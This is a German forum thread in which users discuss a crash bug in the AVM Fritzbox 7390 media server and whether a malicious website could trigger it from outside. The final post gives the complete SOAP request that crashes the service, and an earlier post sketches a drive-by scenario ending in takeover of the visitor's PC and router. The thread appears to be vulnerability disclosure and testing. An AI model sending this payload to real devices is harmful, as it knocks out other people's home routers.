[Info] AVM Mediaserver -externe Webseite killt Mediaserver-

[nuru]

Hallo,

da waren wieder meine 3 Probleme ich sollte lieber nicht mehr mit dem AVM-Mediaserver (7390) spielen (aber es macht doch spaß ). Was ist passiert?

Der AVM-Mediaserver reagiert auf bestimmte SOAP Anfrage sagen wir mal ein wenig überfordert, d.h. er crasht!!! (geht sogar gezielt auf bestimmte Adressen).

Das wäre ja erst einmal kein Problem wird man sich denken, ist ja eh nur aus dem internen Bereich zu erreichen.

FALSCH gedacht - das ist die perfekte Einladung zu einem Remotexploit.

Da nach der letzten Panne mit dem Port 49200 immer gesagt wurde, so etwas lässt sich nicht von aussen nutzen, habe ich mir heute mal erlaubt, eine Webseite online zu stellen welche nach drücken des Button den Mediaserver crashen lässt. Funktioniert nur mit IE sowie Javascript und auf Standartadresse 192.168.178.1 (hatte keine Bock mehr für mehr).

Getestet mit 7390 aktueller offizieller FW und aktueller Labor!

So und nun meine Frage:
Wer hat Lust es mal zu Probieren und die Ergebnisse hier mitzuteilen.

Wenn nicht gewünscht bitte externen Link löschen (keine Werbung !!!)

Seite wurde deaktiviert!


AVM ist auch informiert.

ps: Rechtschreibung/Gramatik war, ist und bleibt mir immer ein Rätsel

 

[hagalabimbo]

Was hat das mit einem Angriff von Extern zu tun? Wenn ich selbst im Intranet aktiv werden muss (Webseite aufrufen), dann ist das ein Zugriff von Intern. Wenn ich dir meine externe IP gebe und du den Server dann ohne mein weiteres Zutun zum Absturz bringst, dann ist es von Extern (dann ist es auch unabhängig on der internen IP).

 

[nuru]

Ich kann es ja auch noch umbauen das dies automatisch läuft und man sich nebei noch bunte Bilder anschauen kann.

SORRY - Es ist nur ein Demo!

Interessanter wäre es hast funktioniert und mit welcher Firmeware!

 

[hagalabimbo]

Wenn es tatsächlich von außen zugreift, weshalb braucht es dann die interne Adresse?

 

[nuru]

Der Besuch der Webseite erfolgt doch nach außen oder ist sie bei Dir intern gespeichert?

Noch einmal z.B.

1. Ich erstelle ein Remoteexploit (macht Arbeit ist aber für diese Lücke überschaubar)
2. Ich mache eine nette Webseite irgendwo im Internet auf mit allg. Interessant Angeboten
3. Die Webseite macht bei einem Besuch aber noch mehr als z.B. die Nachrichten anzuzeigen.
4. Sie fragt bei einem Besuch seinerseits ab ob Fritzbox vorhanden wenn ja Mediaserver aktiv wenn ja Remotexploit.
5. Bei Erfolg habe ich Deinen Rechner und Deine Fritzbox
6. Jetzt kann ich Dich jederzeit Besuchen kommen solange die Box online bist - wie nett!!

DAS GANZE OHNE BUTTON DRÜCKEN BESUCH DER WEBSEITE REICHT AUS.

Ach ja da gab es ja so etwas wie Firewall/Virenscanner&Co Hürde aber kein Hindernis!

Aktuell Java7 oder Samba Problem behoben? Dachte man aber nur und das ganze bis heute

Und was für ein Schluß sollte man daraus ziehen? Prüfen habe ich solche Lücken und wenn ja UPDATEN (wenn es was gibt oder ander Maßnahmen ergreifen)!!! Sonst das schenke ich mir mal.

SORRY - aber Deine Aussagen kann ich so einfach nicht teilen, weil das Szenarion ja voraussetzt das du Online eine Webseite besucht, welche Manipuliert wurde. Also kommt der Crash aus meiner Sicht von Aussen. Dein Rechner Arbeit natürlich intern. Aber die Webseite welche im Internet sitzt hat den Befehl dazugegeben ohne Dich zu fragen und Dein Rechner gehorcht. Anders gesagt, war ich in deiner Wohnung ja oder nein. Ich würde sagen nein also von aussen.


Der Mediaserver arbeit nur im interene Netzwerk!

 

[scolopender]

5. Bei Erfolg habe ich Deinen Rechner und Deine Fritzbox ...

Nach einem Crash?

G., -#####o:

 

[nuru]

257 Aufrufe und keine Testergebnisse SCHADE

 

[dieguteFrauWaas]

Ich benutze XP + IE 8, alle Sicherheitsstufen auf Default zurückgesetzt:

Details zum Fehler auf der Webseite

Benutzer-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; InfoPath.3; .NET4.0E; .NET CLR 1.1.4322)
Zeitstempel: Tue, 2 Oct 2012 06:36:18 UTC


Meldung: Zugriff verweigert

Zeile: 5919
Zeichen: 10
Code: 0
URI: http://www.rsv-md.de/7390/jquery.min.js

Da ich höchstens die Sicherheitsstufen eher verschärfe anstatt aufzuweichen, scheint das bei mir prinzipiell nicht zu funktionieren.

 

[nuru]

Erst einmal Danke für die Rückmeldung.

Du hast recht mit IE8 gibt es ein paar Probleme (gerade getestet) mit IE9 Standardeinstellung bei mir und zwei weiteren funktioniert es super
Das Problem ist nicht die Sache an sich sondern der zusammengewürfelte Code (ist wirklich schlecht - war halt mal auf die schnelle :gruebel

So ich habe mir mal eben kurz die Fehler angeschaut jetzt sollte es mit IE6 IE7 IE8 und IE9 funktionieren. Meine Test dahingehend waren alle positiv. Andere Browser habe ich noch nicht intergriert denn das geht ein wenig anders ; )

 

[nuru]

Nachtrag:

Ich bin im Gegensatz zur letzten Lücke bezüglich des Mediasrv von AVM Support enttäuscht!
Entsprechend, habe ich heute reagiert und das ganze mal den Experten für Öffentlichkeitsarbeit zu kommen lassen.

Für alle die es noch selber testen wollen und können (Webseite habe ich deaktiviert) geht es am einfachsten mit folgender SOAP Anfrage:

POST /MediaServer/ContentDirectory/Control HTTP/1.1
HOST: 192.168.178.1:49000
SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"
CONTENT-TYPE: text/xml; charset="utf-8"
Content-Length: 532
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
<ObjectID>1111111111111</ObjectID>
<BrowseFlag>BrowseMetadata</BrowseFlag>
<Filter />
<StartingIndex>0</StartingIndex>
<RequestedCount>0</RequestedCount>
<SortCriteria />
</u:Browse>
</s:Body>
</s:Envelope>

Wie und was danach geht kann dann ja jeder selber testen!

Auch Freetz ist hiervon betroffen!

getstet auschließlich auf 7390 aktuelle FW letzte Labor FW und eigenes Standard Freetz-Image